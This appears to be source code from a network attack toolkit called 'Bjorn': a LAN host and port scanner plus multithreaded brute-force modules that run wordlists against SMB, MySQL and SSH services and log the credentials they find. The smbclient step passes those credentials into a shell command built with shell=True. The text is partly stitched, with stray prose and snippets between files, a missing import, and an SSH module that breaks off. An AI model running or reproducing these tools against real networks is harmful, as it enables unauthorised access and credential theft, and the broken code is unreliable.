hostnames = row["Hostnames"].split(';')
alive = row["Alive"]
ports = row["Ports"].split(';')
netkb_entries[mac] = {
'IPs': set(ips) if ips[0] else set(),
'Hostnames': set(hostnames) if hostnames[0] else set(),
'Alive': alive,
'Ports': set(ports) if ports[0] else set()
}
for action in existing_action_columns:
netkb_entries[mac][action] = row.get(action, "")
ip_to_mac = {} # Dictionary to track IP to MAC associations
for data in netkb_data:
mac, ip, hostname, ports = data
if not mac or mac == "STANDALONE" or ip == "STANDALONE" or hostname == "STANDALONE":
continue
# Check if MAC address is "00:00:00:00:00:00"
if mac == "00:00:00:00:00:00":
continue
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
# Check if IP is already associated with a different MAC
if ip in ip_to_mac and ip_to_mac[ip] != mac:
# Mark the old MAC as not alive
old_mac = ip_to_mac[ip]
if old_mac in netkb_entries:
netkb_entries[old_mac]['Alive'] = '0'
# Update or create entry for the new MAC
ip_to_mac[ip] = mac
if mac in netkb_entries:
netkb_entries[mac]['IPs'].add(ip)
netkb_entries[mac]['Hostnames'].add(hostname)
netkb_entries[mac]['Alive'] = '1'
netkb_entries[mac]['Ports'].update(map(str, ports))
else:
netkb_entries[mac] = {
'IPs': {ip},
'Hostnames': {hostname},
'Alive': '1',
'Ports': set(map(str, ports))
}
for action in existing_action_columns:
netkb_entries[mac][action] = ""
# Update all existing entries to mark missing hosts as not alive
for mac in netkb_entries:
if mac not in alive_macs:
netkb_entries[mac]['Alive'] = '0'
# Remove entries with multiple IP addresses for a single MAC address
netkb_entries = {mac: data for mac, data in netkb_entries.items() if len(data['IPs']) == 1}
sorted_netkb_entries = sorted(netkb_entries.items(), key=lambda x: self.ip_key(sorted(x[1]['IPs'])[0]))
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(existing_headers) # Use existing headers
for mac, data in sorted_netkb_entries:
row = [
mac,
';'.join(sorted(data['IPs'], key=self.ip_key)),
';'.join(sorted(data['Hostnames'])),
data['Alive'],
';'.join(sorted(data['Ports'], key=int))
]
row.extend(data.get(action, "") for action in existing_action_columns)
writer.writerow(row)
except Exception as e:
self.logger.error(f"Error in update_netkb: {e}")
def display_csv(self, file_path):
"""
Displays the contents of the specified CSV file using Rich for enhanced visualization.
"""
with self.lock:
try:
table = Table(title=f"Contents of {file_path}", show_lines=True)
with open(file_path, 'r') as file:
reader = csv.reader(file)
headers = next(reader)
for header in headers:
table.add_column(header, style="cyan", no_wrap=True)
for row in reader:
formatted_row = [Text(cell, style="green bold") if cell else Text("", style="on red") for cell in row]
table.add_row(*formatted_row)
self.console.print(table)
except Exception as e:
self.logger.error(f"Error in display_csv: {e}")
def get_network(self):
"""
Retrieves the network information including the default gateway and subnet.
"""
try:
gws = netifaces.gateways()
default_gateway = gws['default'][netifaces.AF_INET][1]
iface = netifaces.ifaddresses(default_gateway)[netifaces.AF_INET][0]
ip_address = iface['addr']
netmask = iface['netmask']
cidr = sum([bin(int(x)).count('1') for x in netmask.split('.')])
network = ipaddress.IPv4Network(f"{ip_address}/{cidr}", strict=False)
self.logger.info(f"Network: {network}")
return network
except Exception as e:
self.logger.error(f"Error in get_network: {e}")
def get_mac_address(self, ip, hostname):
"""
Retrieves the MAC address for the given IP address and hostname.
"""
try:
mac = None
retries = 5
while not mac and retries > 0:
mac = gma(ip=ip)
if not mac:
                    time.sleep(2) # Wait 2 seconds before retrying
retries -= 1
if not mac:
mac = f"{ip}_{hostname}" if hostname else f"{ip}_NoHostname"
return mac
except Exception as e:
self.logger.error(f"Error in get_mac_address: {e}")
return None
class PortScanner:
"""
Helper class to perform port scanning on a target IP.
"""
def __init__(self, outer_instance, target, open_ports, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.target = target
self.open_ports = open_ports
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
def scan(self, port):
"""
Scans a specific port on the target IP.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
            try:
                s.connect((self.target, port))
                self.open_ports[self.target].append(port)
            except (socket.timeout, OSError):
                pass
            finally:
                s.close() # Ensure the socket is closed
def start(self):
"""
Starts the port scanning process for the specified range and extra ports.
"""
try:
for port in range(self.portstart, self.portend):
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
for port in self.extra_ports:
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
except Exception as e:
self.logger.info(f"Maximum threads defined in the semaphore reached: {e}")
def scan_with_semaphore(self, port):
"""
Scans a port using a semaphore to limit concurrent threads.
"""
with self.outer_instance.semaphore:
self.scan(port)
class ScanPorts:
"""
Helper class to manage the overall port scanning process for a network.
"""
def __init__(self, outer_instance, network, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.progress = 0
self.network = network
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
self.currentdir = outer_instance.currentdir
self.scan_results_dir = outer_instance.shared_data.scan_results_dir
self.timestamp = outer_instance.get_current_timestamp()
self.csv_scan_file = os.path.join(self.scan_results_dir, f'scan_{network.network_address}_{self.timestamp}.csv')
self.csv_result_file = os.path.join(self.scan_results_dir, f'result_{network.network_address}_{self.timestamp}.csv')
self.netkbfile = outer_instance.shared_data.netkbfile
self.ip_data = None
self.open_ports = {}
self.all_ports = []
self.ip_hostname_list = []
def scan_network_and_write_to_csv(self):
"""
Scans the network and writes the results to a CSV file.
"""
self.outer_instance.check_if_csv_scan_file_exists(self.csv_scan_file, self.csv_result_file, self.netkbfile)
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(['IP', 'Hostname', 'MAC Address'])
except Exception as e:
self.outer_instance.logger.error(f"Error in scan_network_and_write_to_csv (initial write): {e}")
# Use nmap to scan for live hosts
self.outer_instance.nm.scan(hosts=str(self.network), arguments='-sn')
for host in self.outer_instance.nm.all_hosts():
t = threading.Thread(target=self.scan_host, args=(host,))
t.start()
time.sleep(5)
self.outer_instance.sort_and_write_csv(self.csv_scan_file)
def scan_host(self, ip):
"""
Scans a specific host to check if it is alive and retrieves its hostname and MAC address.
"""
if self.outer_instance.blacklistcheck and ip in self.outer_instance.ip_scan_blacklist:
return
try:
hostname = self.outer_instance.nm[ip].hostname() if self.outer_instance.nm[ip].hostname() else ''
mac = self.outer_instance.get_mac_address(ip, hostname)
if not self.outer_instance.blacklistcheck or mac not in self.outer_instance.mac_scan_blacklist:
with self.outer_instance.lock:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow([ip, hostname, mac])
self.ip_hostname_list.append((ip, hostname, mac))
except Exception as e:
self.outer_instance.logger.error(f"Error getting MAC address or writing to file for IP {ip}: {e}")
self.progress += 1
time.sleep(0.1) # Adding a small delay to avoid overwhelming the network
        def get_progress(self):
            """
            Returns the progress of the scanning process as a percentage.
            """
            # Upper bound: total number of addresses in the scanned network
            total = max(self.network.num_addresses, 1)
            return (self.progress / total) * 100
def start(self):
"""
Starts the network and port scanning process.
"""
self.scan_network_and_write_to_csv()
time.sleep(7)
self.ip_data = self.outer_instance.GetIpFromCsv(self.outer_instance, self.csv_scan_file)
self.open_ports = {ip: [] for ip in self.ip_data.ip_list}
with Progress() as progress:
task = progress.add_task("[cyan]Scanning IPs...", total=len(self.ip_data.ip_list))
for ip in self.ip_data.ip_list:
progress.update(task, advance=1)
port_scanner = self.outer_instance.PortScanner(self.outer_instance, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
port_scanner.start()
self.all_ports = sorted(list(set(port for ports in self.open_ports.values() for port in ports)))
alive_ips = set(self.ip_data.ip_list)
return self.ip_data, self.open_ports, self.all_ports, self.csv_result_file, self.netkbfile, alive_ips
class LiveStatusUpdater:
"""
Helper class to update the live status of hosts and clean up scan results.
"""
def __init__(self, source_csv_path, output_csv_path):
self.logger = logger
self.source_csv_path = source_csv_path
self.output_csv_path = output_csv_path
def read_csv(self):
"""
Reads the source CSV file into a DataFrame.
"""
try:
self.df = pd.read_csv(self.source_csv_path)
except Exception as e:
self.logger.error(f"Error in read_csv: {e}")
def calculate_open_ports(self):
"""
Calculates the total number of open ports for alive hosts.
"""
try:
alive_df = self.df[self.df['Alive'] == 1].copy()
alive_df.loc[:, 'Ports'] = alive_df['Ports'].fillna('')
alive_df.loc[:, 'Port Count'] = alive_df['Ports'].apply(lambda x: len(x.split(';')) if x else 0)
self.total_open_ports = alive_df['Port Count'].sum()
except Exception as e:
self.logger.error(f"Error in calculate_open_ports: {e}")
def calculate_hosts_counts(self):
"""
Calculates the total and alive host counts.
"""
try:
# self.all_known_hosts_count = self.df.shape[0]
self.all_known_hosts_count = self.df[self.df['MAC Address'] != 'STANDALONE'].shape[0]
self.alive_hosts_count = self.df[self.df['Alive'] == 1].shape[0]
except Exception as e:
self.logger.error(f"Error in calculate_hosts_counts: {e}")
def save_results(self):
"""
Saves the calculated results to the output CSV file.
"""
try:
if os.path.exists(self.output_csv_path):
results_df = pd.read_csv(self.output_csv_path)
results_df.loc[0, 'Total Open Ports'] = self.total_open_ports
results_df.loc[0, 'Alive Hosts Count'] = self.alive_hosts_count
results_df.loc[0, 'All Known Hosts Count'] = self.all_known_hosts_count
results_df.to_csv(self.output_csv_path, index=False)
else:
self.logger.error(f"File {self.output_csv_path} does not exist.")
except Exception as e:
self.logger.error(f"Error in save_results: {e}")
def update_livestatus(self):
"""
Updates the live status of hosts and saves the results.
"""
try:
self.read_csv()
self.calculate_open_ports()
self.calculate_hosts_counts()
self.save_results()
self.logger.info("Livestatus updated")
self.logger.info(f"Results saved to {self.output_csv_path}")
except Exception as e:
self.logger.error(f"Error in update_livestatus: {e}")
def clean_scan_results(self, scan_results_dir):
"""
Cleans up old scan result files, keeping only the most recent ones.
"""
try:
files = glob.glob(scan_results_dir + '/*')
files.sort(key=os.path.getmtime)
for file in files[:-20]:
os.remove(file)
self.logger.info("Scan results cleaned up")
except Exception as e:
self.logger.error(f"Error in clean_scan_results: {e}")
def scan(self):
"""
Initiates the network scan, updates the netkb file, and displays the results.
"""
try:
self.shared_data.bjornorch_status = "NetworkScanner"
self.logger.info(f"Starting Network Scanner")
network = self.get_network()
self.shared_data.bjornstatustext2 = str(network)
portstart = self.shared_data.portstart
portend = self.shared_data.portend
extra_ports = self.shared_data.portlist
scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
ip_data, open_ports, all_ports, csv_result_file, netkbfile, alive_ips = scanner.start()
alive_macs = set(ip_data.mac_list)
table = Table(title="Scan Results", show_lines=True)
table.add_column("IP", style="cyan", no_wrap=True)
table.add_column("Hostname", style="cyan", no_wrap=True)
table.add_column("Alive", style="cyan", no_wrap=True)
table.add_column("MAC Address", style="cyan", no_wrap=True)
for port in all_ports:
table.add_column(f"{port}", style="green")
netkb_data = []
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
row = [ip, hostname, alive, mac] + [Text(str(port), style="green bold") if port in ports else Text("", style="on red") for port in all_ports]
table.add_row(*row)
netkb_data.append([mac, ip, hostname, ports])
with self.lock:
with open(csv_result_file, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["IP", "Hostname", "Alive", "MAC Address"] + [str(port) for port in all_ports])
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
writer.writerow([ip, hostname, alive, mac] + [str(port) if port in ports else '' for port in all_ports])
self.update_netkb(netkbfile, netkb_data, alive_macs)
if self.displaying_csv:
self.display_csv(csv_result_file)
source_csv_path = self.shared_data.netkbfile
output_csv_path = self.shared_data.livestatusfile
updater = self.LiveStatusUpdater(source_csv_path, output_csv_path)
updater.update_livestatus()
updater.clean_scan_results(self.shared_data.scan_results_dir)
except Exception as e:
self.logger.error(f"Error in scan: {e}")
def start(self):
"""
Starts the scanner in a separate thread.
"""
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.scan)
self.thread.start()
logger.info("NetworkScanner started.")
def stop(self):
"""
Stops the scanner.
"""
if self.running:
self.running = False
if self.thread.is_alive():
self.thread.join()
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
shared_data = SharedData()
scanner = NetworkScanner(shared_data)
scanner.scan()
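
The bit-counting netmask conversion in get_network can also be delegated to the standard ipaddress module, which accepts dotted netmasks directly. A small equivalent sketch:

import ipaddress

def netmask_to_prefixlen(netmask: str) -> int:
    # e.g. "255.255.255.0" -> 24
    return ipaddress.IPv4Network(f"0.0.0.0/{netmask}").prefixlen

assert netmask_to_prefixlen("255.255.255.0") == 24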

261
actions/smb_connector.py Normal file

@@ -0,0 +1,261 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
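
The share-enumeration logic in smb_connect boils down to the following trimmed sketch, assuming pysmb is installed (the 10-second timeout is an assumption):

from smb.SMBConnection import SMBConnection

def list_accessible_shares(host: str, user: str, password: str) -> list:
    # Authenticate, list the shares, and keep only those we can actually browse.
    conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
    accessible = []
    if conn.connect(host, 445, timeout=10):
        for share in conn.listShares():
            if share.isSpecial or share.isTemporary:
                continue
            try:
                conn.listPath(share.name, '/')
                accessible.append(share.name)
            except Exception:
                pass  # share exists but is not readable with these credentials
        conn.close()
    return accessible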

204
actions/sql_connector.py Normal file

@@ -0,0 +1,204 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# First attempt without specifying a database
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# If the connection succeeds, retrieve the list of databases
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Return success together with the list of databases found
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while True:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
try:
adresse_ip, user, password, port = self.queue.get_nowait() # non-blocking: a plain get() can hang forever if another worker drains the queue after the empty() check
except Empty:
break
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait() # non-blocking drain: a worker may grab the last item first
except Empty:
break
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

198
actions/ssh_connector.py Normal file

@@ -0,0 +1,198 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue, Empty
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
with open(shared_data.usersfile, "r") as f:
self.users = f.read().splitlines()
with open(shared_data.passwordsfile, "r") as f:
self.passwords = f.read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while True:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
try:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get_nowait() # non-blocking: avoids hanging when another worker drains the queue after the empty() check
except Empty:
break
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
